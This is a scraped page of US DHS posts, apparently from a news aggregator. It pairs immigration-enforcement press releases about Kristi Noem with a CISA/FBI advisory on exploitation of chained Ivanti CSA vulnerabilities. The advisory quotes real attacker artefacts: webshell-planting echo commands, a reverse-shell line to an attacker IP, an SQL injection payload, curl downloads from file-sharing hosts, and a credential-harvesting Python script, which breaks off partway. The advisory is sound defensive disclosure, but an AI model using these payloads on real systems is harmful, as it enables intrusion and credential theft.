Category: US Department of Homeland Security

Category Added in a WPeMatico Campaign

Posted on

PHOTO RELEASE: Secretary Kristi Noem Hits the Streets with ICE Agents

Source: US Department of Homeland Security

New York City – Today, Secretary Kristi Noem went on an Immigration and Customs Enforcement (ICE) removal operation in New York City. The target of this operation was violent criminals, including a ringleader of Tren De Aragua, in the United States. 

Secretary Noem addressed the law enforcement agents and officers apart of the operation

” data-asset-id=”58659″ data-asset-link=”1″ data-asset-type=”imageasset” data-entity-type=”emerald” data-image-style=”large” src=”/sites/default/files/styles/large/public/externals/ac81552bbb75e2e484041aafc0d84b9a.jpg.webp?itok=xVxbsG14″/>

Secretary Noem addressed the law enforcement agents and officers apart of the operation | View Original
On January 28, Secretary Noem rode with DHS law enforcement to arrest criminal aliens in New York City.  

” data-asset-id=”58662″ data-asset-link=”1″ data-asset-type=”imageasset” data-entity-type=”emerald” data-image-style=”large” src=”/sites/default/files/styles/large/public/externals/1e47e9dd831b06c27ae9e4d8bbd5f388.jpg.webp?itok=1SCZ9XlV”/>

On January 28, Secretary Noem rode with DHS law enforcement to arrest criminal aliens in New York City.   | View Original
Secretary Noem with law enforcement outside one of the targets of the removal operation.

” data-asset-id=”58660″ data-asset-link=”1″ data-asset-type=”imageasset” data-entity-type=”emerald” data-image-style=”large” src=”/sites/default/files/styles/large/public/externals/92e1f3199d8aa9f51c2cc0e6c8a50296.jpg.webp?itok=7vWVw9Uw”/>

Secretary Noem with law enforcement outside one of the targets of the removal operation. | View Original
ICE, DEA, Secret Service, NYPD, ATF New York, and the U.S. Marshalls participated in the immigration raids.  

” data-asset-id=”58661″ data-asset-link=”1″ data-asset-type=”imageasset” data-entity-type=”emerald” data-image-style=”large” src=”/sites/default/files/styles/large/public/externals/088ed64b11652d4f38db3b4de24d1467.jpg.webp?itok=g6DStRVP”/>

ICE, DEA, Secret Service, NYPD, ATF New York, and the U.S. Marshalls participated in the immigration raids.   | View Original
Posted on

President Trump is Already Securing Our Border and Deporting Criminal Aliens

Source: US Department of Homeland Security

Immediately after being sworn in President Trump took executive action to stop the invasion at the southern border and to empower law enforcement agents to deport criminal aliens

“In a move fulfilling one of now-President Donald Trump’s campaign promises, the Trump administration shuttered the use of CBP One, a President Joe Biden-era app meant to help process migrants seeking to apply for asylum in the U.S.” USA Today: Trump kills Biden-era CBP One app for asylum-seekers at the border

“The Department of Homeland Security (DHS) on Monday issued memos to repeal limits on Immigration and Customs Enforcement (ICE) agents imposed by former DHS Secretary Alejandro Mayorkas…ICE agents who spoke to Fox News said they believe that rescinding the Mayorkas order is going to free them up to go after more illegal immigrants.” Fox News: Trump DHS repeals key Mayorkas memo limiting ICE agents, orders parole review

On January 22, ICE law enforcement’s officers arrested Franz Cadet a 43-year-old citizen of Haiti. Cadet was convicted of multiple drug offenses. 

” data-asset-id=”58359″ data-asset-link=”1″ data-asset-type=”imageasset” data-entity-type=”emerald” data-image-style=”large” src=”/sites/default/files/styles/large/public/externals/e6077616e171e1c4f72056e53f9c4470.jpg.webp?itok=_0eQ4Ikk”/>

On January 22, ICE law enforcement’s officers arrested Franz Cadet a 43-year-old citizen of Haiti. Cadet was convicted of multiple drug offenses.  | View Original

“Federal officers swept into sanctuary cities on President Trump’s first full day in office Tuesday, nabbing more than 300 illegal migrant criminals — including an attempted murderer and a child molester — to hold them for deportation.” The New York Post: ICE arrested 308 illegal migrants — including attempted murderer and a child molester — on Trump’s first full day in office

“The Trump administration is attempting to amass a larger force of law-enforcement officials to help carry out deportations by granting agents across the federal government the same powers as an immigration officer, according to an internal memo.” The Wall Street Journal: Trump Gives Gun, Drug Agents Deportation Power

“The number of Border Patrol encounters at the southern border in the first three days of the Trump administration is 35% lower than the final three days of the Biden administration, the sources said.” Fox News: Border encounters drop sharply as Trump launches crackdown on illegal immigration 

Posted on

PHOTO RELEASE: Kristi Noem Sworn in as the Secretary of DHS

Source: US Department of Homeland Security

WASHINGTON – Yesterday, Kristi Noem was confirmed by the U.S. Senate in a vote of 59-34  and sworn in as the Secretary of the Department of Homeland Security by U.S. Supreme Court Justice Clarence Thomas.  

“It is such an honor to be sworn in as the United States Secretary of Homeland Security. It was made even more meaningful by being sworn in by Supreme Court Justice Clarence Thomas at his home. Thank you, President Trump for putting your trust in me to help keep America safe.”  

— Secretary Kristi Noem  

On January 25, Kristi Noem is sworn in as the Secretary of the Department of Homeland Security

” data-asset-id=”58348″ data-asset-link=”1″ data-asset-type=”imageasset” data-entity-type=”emerald” data-image-style=”large” src=”/sites/default/files/styles/large/public/externals/d505d2c6eeb96b260e0bf3ec5f6b6333.jpg.webp?itok=Qj2BrOKq”/>

On January 25, Kristi Noem is sworn in as the Secretary of the Department of Homeland Security | View Original
The swearing-in ceremony took place at the home of U.S. Supreme Court Justice Clarence Thomas.

” data-asset-id=”58349″ data-asset-link=”1″ data-asset-type=”imageasset” data-entity-type=”emerald” data-image-style=”large” src=”/sites/default/files/styles/large/public/externals/b0642fea0bc46d5281a980c46b4a66c5.jpg.webp?itok=voFvGwUA”/>

The swearing-in ceremony took place at the home of U.S. Supreme Court Justice Clarence Thomas. | View Original
On January 25, Kristi Noem is sworn in as the Secretary of the Department of Homeland Security

” data-asset-id=”58347″ data-asset-link=”1″ data-asset-type=”imageasset” data-entity-type=”emerald” data-image-style=”large” src=”/sites/default/files/styles/large/public/externals/eeffcfca5c3db081f5303d7872426ff4.jpg.webp?itok=o7Q6ncNh”/>

On January 25, Kristi Noem is sworn in as the Secretary of the Department of Homeland Security | View Original
On January 25, Kristi Noem is sworn in as the Secretary of the Department of Homeland Security

” data-asset-id=”58346″ data-asset-link=”1″ data-asset-type=”imageasset” data-entity-type=”emerald” data-image-style=”large” src=”/sites/default/files/styles/large/public/externals/8a6abd552845ee30f4fda87ab732b217.jpg.webp?itok=zGe7jFfu”/>

On January 25, Kristi Noem is sworn in as the Secretary of the Department of Homeland Security | View Original
Posted on

US Senate Confirms Kristi Noem as Secretary of Homeland Security

Source: US Department of Homeland Security

WASHINGTON – Today, the United States Senate voted overwhelmingly to confirm Kristi Noem as the 8th Secretary of the Department of Homeland Security in a vote of 59- 34.

A statement from Secretary Noem on her confirmation is below: 

“As the Secretary of the Department of Homeland Security, I will work every day to keep all Americans safe and secure. One of my top priorities is achieving President Trump’s mandate from the American people to secure our southern border and fix our broken immigration system. 

“The Trump Administration will once-again empower our brave men and women in law enforcement to do their jobs and remove criminal aliens and illegal gangs from our country. We will fully equip our intelligence and law enforcement to detect and prevent terror threats and will deliver rapid assistance and disaster relief to Americans in crisis. 

“I thank President Trump and the US Senate for their trust in me. Together, we will ensure that the United States, once again, is a beacon of freedom, safety, and security for generations to come.” 

Prior to her confirmation as Secretary of the Department of Homeland Security, Secretary Noem served as South Dakota’s 33rd Governor and first ever female governor.  A rancher, farmer, and small business owner, Noem served in the South Dakota legislature for years and was later elected to serve as South Dakota’s sole member of the U.S. House of Representatives. 

Posted on

Statement from a DHS Spokesperson on Directive Expanding Immigration Law Enforcement

Source: US Department of Homeland Security

WASHINGTON – Today, Acting Department of Homeland Security Secretary Benjamine Huffman issued a directive essential to fulfilling President Trump’s promise to carry out mass deportations.

The directive gives Department of Justice (DOJ) law enforcement officials in the U.S. Marshals, Drug Enforcement Administration (DEA), the Bureau of Alcohol, Tobacco, Firearms and Explosives, and the Federal Bureau of Prisons authority to investigate and apprehend illegal aliens.

“Thanks to the last Administration’s open border policies, we’ve seen violent criminals and gang members terrorize American communities. Today’s action empowers law enforcement officials at the DOJ to help identify and apprehend aliens who have illegally come into our country. Mobilizing these law enforcement officials will help fulfill President Trump’s promise to the American people to carry out mass deportations. For decades, efforts to find and apprehend illegal aliens have not been given proper resources. This is a major step in fixing that problem.”

Posted on

Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications

Source: US Department of Homeland Security

Note: The CVEs in this advisory are unrelated to vulnerabilities (CVE-2025-0282 and CVE-2025-0283) in Ivanti’s Connect Secure, Policy Secure and ZTA Gateways. For more information on mitigating CVE -2025-0282 and CVE-2025-0283, see Ivanti Releases Security Updates for Connect Secure, Policy Secure, and ZTA Gateways.

Summary

The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory in response to exploitation in September 2024 of vulnerabilities in Ivanti Cloud Service Appliances (CSA): CVE-2024-8963, an administrative bypass vulnerability; CVE-2024-9379, a SQL injection vulnerability; and CVE-2024-8190 and CVE-2024-9380, remote code execution vulnerabilities.

According to CISA and trusted third-party incident response data, threat actors chained the listed vulnerabilities to gain initial access, conduct remote code execution (RCE), obtain credentials, and implant webshells on victim networks. The actors’ primary exploit paths were two vulnerability chains. One exploit chain leveraged CVE-2024-8963 in conjunction with CVE-2024-8190 and CVE-2024-9380 and the other exploited CVE-2024-8963 and CVE-2024-9379. In one confirmed compromise, the actors moved laterally to two servers.

All four vulnerabilities affect Ivanti CSA version 4.6x versions before 519, and two of the vulnerabilities (CVE-2024-9379 and CVE-2024-9380) affect CSA versions 5.0.1 and below; according to Ivanti, these CVEs have not been exploited in version 5.0.[1]

Ivanti CSA 4.6 is End-of-Life (EOL) and no longer receives patches or third-party libraries. CISA and FBI strongly encourage network administrators to upgrade to the latest supported version of Ivanti CSA. Network defenders are encouraged to hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) within this advisory. Credentials and sensitive data stored within the affected Ivanti appliances should be considered compromised. Organizations should collect and analyze logs and artifacts for malicious activity and apply the incident response recommendations within this advisory.

Download the PDF version of this report:

For a downloadable copy of IOCs, see:

Technical Details

Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 16. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.

In September 2024, Ivanti released two Security Advisories disclosing exploitation of CVE-2024-8190 and CVE-2024-8963.[2][3] In October 2024, Ivanti released another advisory disclosing exploitation of CVE-2024-9379 and CVE-2024-9380.[1]

  • CVE-2024-8963 [CWE-22: Path Traversal] is an administrate bypass vulnerability that allows threat actors to remotely access restricted features within the appliance. When used in conjunction with CVE-2024-8190 [CWE-78: OS Command Injection], threat actors can remotely authenticate into a victims’ network and execute arbitrary commands on the appliance [T1219].[2][3]
  • CVE-2024-9379 [CWE-89: SQL Injection] allows a remote authenticated attacker with admin privileges to run arbitrary SQL statements.[1]
  • CVE-2024-9380 [CWE-77: Command Injection] allows a remote authenticated attacker with admin privileges to obtain RCE.[1]

According to Ivanti’s advisories and industry reporting, these vulnerabilities were exploited as zero days.[4] Based on evidence of active exploitation, CISA added CVE-2024-8963, CVE-2024-8190, CVE-2024-9379, and CVE-2024-9380 to its Known Exploited Vulnerabilities (KEV) Catalog.

According to CISA and trusted third-party incident response data, threat actors chained the above listed vulnerabilities to gain initial access, conduct RCE, obtain credentials, and implant webshells on victim networks. The primary exploit paths included two vulnerability chains. One exploit chain leveraged CVE-2024-8963 in conjunction with CVE-2024-8190 and CVE-2024-9380. The other chain exploited CVE-2024-8963 and CVE-2024-9379. After exploitation, the actors moved laterally in one victim—other victims had no follow-on activity because they identified anomalous activity and implemented mitigation measures.

Exploit Chain 1

The threat actors leveraged CVE-2024-8963 in conjunction with remote code execution vulnerabilities, CVE-2024-8190 and CVE-2024-9380. Acting as a nobody user [T1564.002], the threat actors first sent a GET request to datetime.php to acquire session and cross-site request forgery (CSRF) tokens using GET /client/index.php%3F.php/gsb/datetime[.]php [T1071.001]. They followed this in quick succession with a POST request to the same endpoint, using the TIMEZONE input field to manipulate the setSystemTimeZone function and execute code. In some confirmed compromises, the actors used this method to run base64-encoded Python scripts that harvested encrypted admin credentials from the database [T1552.001]. Note: The actors used multiple script variations. See Appendix A for examples of encoded and decoded scripts.

In some cases, the threat actors exfiltrated the encrypted admin credentials then decrypted them offline [TA0010]. In other cases, the threat actors leveraged an executable matching the regular expression phpw{6} located in the /tmp directory to decrypt the credentials prior to exfiltration—this tool was unrecoverable.

After obtaining credentials, the actors logged in and exploited CVE-2024-9380 to execute commands from a higher privileged account. The actors successfully sent a GET request to /gsb/reports[.]php. They immediately followed this with a POST request using the TW_ID input field to execute code to implant webshells for persistence [T1505.003].

In one confirmed compromise, the threat actors tried to create webshells using two different paths:

  • echo "
    $_REQUEST['a']);">/opt/ivanti/csa/broker/webroot/client/help.php
  • echo "
    $_REQUEST['a']);" > /opt/landesk/broker/webroot/gsb/help.php

In the same compromise, the actors used the exploit to execute the following script to create a reverse Transmission Control Protocol command and control (C2) channel: bash -i >&/dev/tcp/107.173.89[.]16/8000 0>&1.

In another compromise, the threat actors maintained their presence on the victim’s system for a longer amount of time. The threat actors used sudo commands to disable the vulnerability in DateTimeTab.php, modify and remove webshells, and remove evidence of exploitation [T1548.003]. See Appendix B for the list of sudo commands used.

Lateral Movement

In one case, there was evidence of lateral movement after the threat actors gained access and established a foothold through this exploit chain. It is suspected that the threat actors gained access into a Jenkins server running a vulnerable, outdated version [T1068]. Logs on the Jenkins machine showed that a command in the bash history contained credentials to the postgres server. The threat actors then attempted to log into the Virtual Private Network (VPN) server but were unsuccessful. Prior to moving laterally, the actors likely performed discovery on the CSA device using Obelisk and GoGo to scan for vulnerabilities [T1595.002].

Exploit Chain 2

In one confirmed compromise, the actors used a similar exploit chain, exploiting CVE-2024-8963 in conjunction with CVE-2024-9379, using GET /client/index.php%3f.php/gsb/broker.php for initial access.

After the threat actors gained initial access, they attempted to exploit CVE-2024-9379 to create a webshell to gain persistent access. They executed GET and POST requests in quick succession to /client/index.php%3F.php/gsb/broker.php. In the POST body, threat actors entered the following string in the lockout attempts input box: LOCKOUTATTEMPTS = 1 ;INSERT INTO user_info(username, accessed, attempts) VALUES ('''echo -n TnNhV1Z1ZEM5b1pXeHdMbk>>/.k''', NOW(), 10). The first portion of the command (LOCKOUTATTEMPTS=1) fit the format of the application and was properly handled by the application. However, the second portion of the command, a SQL injection [T1190], was not properly handled by the application. Regardless, the application processed both commands, allowing the threat actors to insert a user into the user_info table.

After inserting valid bash code as a user in the user_info table, the threat actors attempted to login as the user. The authoring agencies believe the threat actors knew this login would fail but were attempting to coerce the application into handling the bash code improperly. In this attempt, the application did not evaluate the validity of the login, but instead ran echo -n TnNhV1Z1ZEM5b1pXeHdMbk>>./k as if it were code. The threat actors repeated the process of echo commands until they built a valid web shell [T1059]. However, there were no observations that the threat actors were successful.

Detection of Activity

According to incident response data from three victim organizations, the actors were unsuccessful with follow-on activity due to the organizations’ rapid detection of the malicious activity. To remediate exploitation, all three organizations replaced the virtual machines with clean and upgraded versions.

Victim Organization 1

The first organization detected malicious activity early in the exploitation. A system administrator detected the anomalous creation of user accounts. After investigation, the organization remediated the incident. While it is likely admin credentials were exfiltrated, there were no signs of lateral movement.

Victim Organization 2

This organization had an endpoint protection platform (EPP) installed on their system that alerted when the threat actors executed base64 encoded script to create webshells. There were no indications of webshells successfully being created or of lateral movement.

Victim Organization 3

This organization leveraged the IOC findings from the other two victim sites to quickly detect malicious activity. This threat activity included the download and deployment of Obelisk and GoGo Scanner, which generated a large number of logs. The organization used these logs to identify anomalous activity.

Indicators of Compromise

See Table 1 through Table 3 for IOCs related to the threat actors’ exploitation of CVE-2024-8963, CVE-2024-8190, CVE-2024-9379, and CVE-2024-9380 in Ivanti CSA.

Disclaimer: Some IP addresses in this cybersecurity advisory may be associated with legitimate activity. Organizations are encouraged to investigate the activity around these IP addresses prior to taking action, such as blocking. Activity should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors.

Table 1: IP Address Used for Credential Theft, September 2024
File Name IP Address Description
"/client/index.php%3f.php/gsb/datetime.php 142.171.217[.]195 /var/log/messages
"/client/index.php%3f.php/gsb/datetime.php 154.64.226[.]166 /var/log/messages-20240904.gz
"/client/index.php%3f.php/gsb/datetime.php 216.131.75[.]53  
"/client/index.php%3f.php/gsb/datetime.php 23.236.66[.]97 /var/log/messages-20240905.gz
"/client/index.php%3f.php/gsb/datetime.php 38.207.159[.]76 /var/log/messages-20240906.gz
Table 2: Survey 2, Ivanti CSA Network IOC List, September 2024
File Name IP Address Description
  149.154.167[.]41  
  95.161.76[.]100  
hxxps://file.io/E50vtqmJP5aa    
hxxps://file.io/RBKuU8gicWt    
hxxps://file.io/frdZ9L18R7Nx    
hxxp://ip.sb    

hxxps://pan.xj.hk/d/

6401646e701f5f47518ecef48a308a36/redis

    
  142.171.217[.]195  
  108.174.199[.]200  
  206.189.156[.]69  
  108.174.199[.]200/Xa27efd2.tmp  
  142.171.217[.]195  
Table 3: Additional IOCs Derived from Incident Response, September 2024
Type IOC Description
Ipv4 107.173.89[.]16  
Ipv4 38.207.159[.]76  
Ipv4 142.171.217[.]195  
Ipv4 154.64.226[.]166  
Ipv4 156.234.193[.]18  
Ipv4 216.131.75[.]53  
Ipv4 205.169.39[.]11  
Ipv4 23.236.66[.]97  
Ipv4 149.154.176[.]41  
Ipv4 95.161.76[.]100  
Ipv4 142.171.217[.]195  
Ipv4 108.174.199[.]200  
Ipv4 206.189.156[.]69  
Ipv4 142.171.217[.]195  
Ipv4 67.217.228[.]83  
Ipv4 203.160.72[.]174  
Ipv4 142.11.217[.]3  
Ipv4 104.168.133[.]228  
Ipv4 64.176.49[.]160  
Ipv4 45.141.215[.]17  
Ipv4 142.171.217[.]195  
Ipv4 98.101.25[.]30  
Ipv4 216.131.75[.]53  
Ipv4 134.195.90[.]71  
Ipv4 23.236.66[.]97  
Hash a50660fb31df96b3328640fdfbeea755  
Hash 53c5b7d124f13039eb62409e1ec2089d  
Hash 698a752ec1ca43237cb1dc791700afde  
Hash aa69300617faab4eb39b789ebfeb5abe  
Hash c2becc553b96ba27d60265d07ec3bd6c  
Hash cacc30e2a5b2683e19e45dc4f191cebc /opt/ivanti/csa/broker/webroot/client/help.php
Hash 061e5946c9595e560d64d5a8c65be49e /opt/landesk/broker/webroot/gsb/view.php
Hash

e35cf026057a3729387b7ecfb213ae

62a611f0f1a418876b11c9df3b56885bed

 /tmp/brokerdebug
Hash c7d20ca6fe596009afaeb725fec8635f /opt/landesk/broker/webroot/gsb/help.php
Hash F7F81AE880A17975F60E1E0FE1A4048B /opt/landesk/broker/webroot/gsb/DateTimeTab.php
Hash 86B62FFD33597FD635E01B95F08BB996 /opt/landesk/broker/webroot/gsb/style.php
Hash DD975310201079CACD4CDE6FACAB8C1D /opt/landesk/broker/webroot/client/index.php
Hash 1B20E9310CA815F9E2BD366FB94E147F

/sbin/systemd  

Configuration file at /WpService.conf
Hash 30f57e14596f1bcad7cc4284d1af4684

/sbin/systemd 

Configuration file at /WpService.conf
URL hxxps://file.io/E50vtqmJP5aa  
URL hxxps://file.io/RBKuU8gicWt  
URL hxxps://file.io/frdZ9L18R7Nx  
URL hxxp://ip.sb  
URL

hxxps://pan.xj.hk/d/

6401646e701f5f47518ecef48a308a36/redis

  
URL 108.174.199.200/Xa27efd2.tmp  
URL 45.33.101.53/log  
URL 45.33.101.53/log2  
URL 208.184.237.75/fdsupdate  
URL 173.243.138.76/fdsupdate  
URL cri07nnrg958pkh6qhk0977u8c83jog6t.oast[.]fun  
URL cri07nnrg958pkh6qhk0yrgy1e76p1od6.oast[.]fun  
domain gg.oyr2ohrm.eyes[.]sh  
domain ggg.oyr2ohrm.eyes[.]sh  
domain gggg.oyr2ohrm.eyes[.]sh  
domain txt.xj[.]hk  
domain book.hacktricks[.]xyz  
host sh -c setsid /dev/shm/redis &  
host

sh -c curl -k https://file[.]io/1zqvMYY1dpkk -o

/dev/shm/redis2

  
host sh -c mv /dev/shm/redis2 /dev/shm/redis  
host sh -c rm /dev/shm/*  
host rm /dev/shm/PostgreSQL.1014868572 /dev/shm/redis  
host 78cc672218949a9ec87407ad3bcb5db6 Agent.zip
host d13f71e51b38ffef6b9dc8efbed27615 Log.log
host d88bfac2b43509abdc70308bef75e2a6 Log.exe
host R.exe (MD5: 60d5648d35bacf5c7aa713b2a0d267d3) R.exe
host ae51c891d2e895b5ca919d14edd42c26 CAService.exe
host d88bfac2b43509abdc70308bef75e2a6 Lgfxsys.exe
host f82847bccb621e6822a3947bc9ce9621 NetlO.cfg
host c894f55c8fa9d92e2dd2c78172cff745 XboVFyKw.tmp
host MD5: Unknown Wi.bat
host MD5: Unknown dCUgGXfm.tmp
host MD5: Unknown DijZViHC.tmp
CrowdStrike Falcon e09fef2f502a41c199046219a6584e8d CrowdStrike falcon cid
/var/secure log nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/ln -sf  
/var/secure log nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/mv /tmp/php.ini /etc/php.ini  
/var/secure log nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/sbin/hwclock --localtime --systohc   
/var/secure log nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/subin/backuptool --fullList  
Ipv4 142.171.217[.]195  
Ipv4 107.173.89[.]16  
Ipv4 192.42.116[.]210  
Ipv4 82.197.182[.]161  
Ipv4 154.213.185[.]230  
Ipv4 216.131.75[.]53  
Ipv4 23.236.66[.]97  
Ipv4 208.105.190[.]170  
Ipv4 136.144.17[.]145  
Ipv4 136.144.17[.]133  
Ipv4 216.73.162[.]56  
Ipv4 104.28.240[.]123  
Ipv4 163.5.171[.]49  
Ipv4 89.187.178[.]179  
Ipv4 163.5.171[.]49  
Ipv4 203.160.86[.]69  
Ipv4 185.220.69[.]83  
Ipv4 185.199.103[.]196  
Ipv4 188.172.229[.]15  
Ipv4 155.138.215[.]144  
Ipv4 64.176.49[.]160  
Ipv4 185.40.4[.]38  
Ipv4 216.131[.]75.53  
Ipv4 185.40.4[.]95  

MITRE ATT&CK Tactics and Techniques

See Table 4 to Table 13 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Table 4: Reconnaissance
Technique Title ID Use
Active Scanning: Vulnerability Scanning T1595.002 Threat actors performed reconnaissance by using Obelisk and GoGo to scan for vulnerabilities.
Table 5: Initial Access
Technique Title ID Use
Exploit Public-Facing Application T1190 Threat actors leveraged weaknesses in applications that are not properly handled to compromise network device protocols, perform SQL injections, and generally exploit applications.
Table 6: Execution
Technique Title ID Use
Command and Scripting Interpreter T1059 Threat actors abused command and script interpreters to execute commands, scripts, or binaries.
Table 7: Persistence
Technique Title ID Use
Modify Authentication Process T1556 Threat actors executed an authentication bypass by exploiting the authentication mechanisms of a device to gain access to organizations’ networks.
Server Software Component: Web Shell T1505.003 Threat actors executed code to implant webshells for persistence.
Table 8: Privilege Escalation
Technique Title ID Use
Exploitation for Privilege Escalation T1068 Threat actors leveraged weaknesses to gain access via an outdated, vulnerable version of a server.
Table 9: Defense Evasion
Technique Title ID Use
Hide Artifacts: Hidden Users T1564.002 Threat actors acted as a hidden user to disguise their presence on a system.
Deobfuscate/Decode Files or Information T1140 Threat actors decrypted credentials prior to exfiltration by leveraging native tools located in the extracted backup file.
Abuse Elevation Control Mechanism: Sudo and Sudo Caching T1548.003 Threat actors used sudo commands to disable vulnerabilities, modify and remove webshells, and remove evidence of exploitation.
Table 10: Credential Access
Technique Title ID Use
Unsecured Credentials: Credentials in Files T1552.001 Threat actors harvested encrypted admin credentials to gain further access.
Table 11: Lateral Movement
Technique Title ID Use
Exploitation of Remove Services T1210 Threat actors exploited CSAs via remote services to gain access to an organization’s networks by leveraging programming errors, EOL systems, and operating systems.
Table 12: Command and Control
Technique Title ID Use
Remote Access Software T1219 Threat actors attempted to remotely authenticate into a victim’s network and execute arbitrary commands on the appliance.
Application Layer: Web Protocol T1071.001 Threat actors used tools such as GET or POST requests to acquire session and CSRF tokens.
Table 13: Exfiltration
Technique Title ID Use
Exfiltration TA0010 Threat actors exfiltrated encrypted admin credentials or other encrypted data for future use.

Incident Response

If compromise is detected, the authoring agencies recommend that organizations:

  1. Quarantine or take offline potentially affected hosts.
  2. Reimage compromised hosts.
  3. Provision new account credentials.
  4. For Ivanti hosts with Active Directory (AD) access, threat actors can trivially export active domain administrator credentials during initial compromise. Until there is evidence to the contrary, it is assumed that AD access on compromised systems is connected to external authentication systems such as Lightweight Directory Access Protocol and AD.
  5. Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.
    Note: Removing malicious administrator accounts may not fully mitigate risk considering threat actors may have established additional persistence mechanisms.
  6. Report the compromise to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870).

Mitigations

CISA and FBI recommend organizations: 

  • Upgrade to the latest supported version of Ivanti CSA immediately for continued support.[3] Please note that Ivanti CSA 4.6 is EOL and no longer receives patches or third-party libraries. Customers must upgrade to the latest version of the product for continued support.
  • Install endpoint detection and response (EDR) on the system to alert network defenders on unusual and potentially malicious activity.
  • Establish a baseline and maintain detailed logs of network traffic, account behavior, and software. This can assist network defenders in identifying anomalies that may indicate malicious activity more quickly.
  • Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Organizations should patch vulnerable software and hardware systems within 24 to 48 hours of vulnerability disclosure. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
  • Secure remote access tools by:
    • Implementing application controls to manage and control software execution, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.
  • Strictly limit the use of remote desktop protocol (RDP) and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]:
  • Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations requiring administrator privileges to reduce the risk of lateral movement by PsExec.
  • Follow best cybersecurity practices in your production and enterprise environments,including mandating phishing-resistant multifactor authentication (MFA) for all staff and services. For additional best practices, see CISA’s Cross-Sector Cybersecurity Performance Goals (CPGs). The CPGs, developed by CISA and the National Institute of Standards and Technology (NIST), are a prioritized subset of IT and OT security practices that can meaningfully reduce the likelihood and impact of known cyber risks and common tactics, techniques, and procedures. Because the CPGs are a subset of best practices, CISA and FBI also recommend software manufacturers implement a comprehensive information security program based on a recognized framework, such as the NIST Cybersecurity Framework (CSF).

Validate Security Controls

In addition to applying mitigations, CISA and FBI recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and FBI recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Table 4 through Table 13).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA and FBI recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

References

  1. Ivanti: Security Advisory Ivanti CSA (Cloud Services Application) (CVE-2024-9379, CVE-2024-9380, CVE-2024-9381)
  2. Ivanti: Security Advisory Ivanti Cloud Service Appliance (CSA) (CVE-2024-8190)
  3. Ivanti: Security Advisory Ivanti CSA 4.6 (Cloud Services Appliance) (CVE-2024-8963)
  4. Fortinet: Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA

Contact Information

Organizations are encouraged to report suspicious or criminal activity related to information in this advisory to:

  • CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870) or your local FBI field office. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.

Disclaimer

The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI.

Version History

January 22, 2025: Initial version.

Appendix A: Encoded and Decoded Scripts

Decoded Python Scripts

{
import os, re, base64, time
os.chdir("/tmp")
d = "/backups"
def set_msg(p, t='', m=''):
   if t and m:
       msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
   else:
       msg = ''
   os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))
try:
   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
   r = None
with open("/opt/landesk/broker/broker.conf") as f:
   dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0]
if r:
   p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\'admin'\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("n")[-4].strip().split(':')
   os.system("tar zxvf {}".format(r))
   while True:
       for f in os.listdir('.'):
           if re.match("phpw{6}", f):
               os.chmod(f, 0o777)
               m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
               if m:
                   set_msg(dbpwd, "PASSWORD", m)
                   time.sleep(30)
                   set_msg(dbpwd)
                   exit()
else:
   set_msg(dbpwd, 'ERROR', 'NO BACKUP')
}
{
import os, re, base64, time
os.chdir("/tmp")
d = "/backups"
def set_msg(p, t='', m=''):
   if t and m:
       msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
   else:
       msg = ''
